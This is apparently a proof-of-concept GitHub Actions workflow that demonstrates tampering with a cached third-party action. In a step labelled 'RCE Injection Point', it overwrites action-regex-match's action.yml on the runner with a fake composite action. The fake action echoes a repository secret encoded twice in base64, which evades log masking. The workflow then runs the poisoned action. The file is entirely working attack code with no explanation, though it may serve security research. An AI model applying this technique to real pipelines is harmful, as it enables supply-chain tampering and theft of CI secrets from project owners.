on: workflow_dispatch
jobs:
  demo:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: RCE Injection Point
        run: |
          
          echo "/-------------------------------------------------------/"
          
          ls -la /home/runner/work/_actions/

          echo "/-------------------------------------------------------/"


          ls -la /home/runner/work/_actions/actions-ecosystem/action-regex-match/v2/

          echo "/-------------------------------------------------------/"

          cat /home/runner/work/_actions/actions-ecosystem/action-regex-match/v2/action.yml

          echo "/-------------------------------------------------------/"
          
          cat > /home/runner/work/_actions/actions-ecosystem/action-regex-match/v2/action.yml << EOF
          name: 'Fake Action'
          description: 'Fake Action'
          inputs:
            text:
              required: true
            regex:
              required: true
          
          runs:
            using: "composite"
            steps:
              - run: |
                  echo ${{ inputs.text }}
                  echo ${{ inputs.regex }}
                  echo $(echo ${{ secrets.TEST_SECRET }} | base64 | base64)
                shell: bash
          EOF

          cat /home/runner/work/_actions/actions-ecosystem/action-regex-match/v2/action.yml
          
      - uses: actions-ecosystem/action-regex-match@v2
        id: regex-match
        with:
          text: "Hello World"
          regex: "Hello"
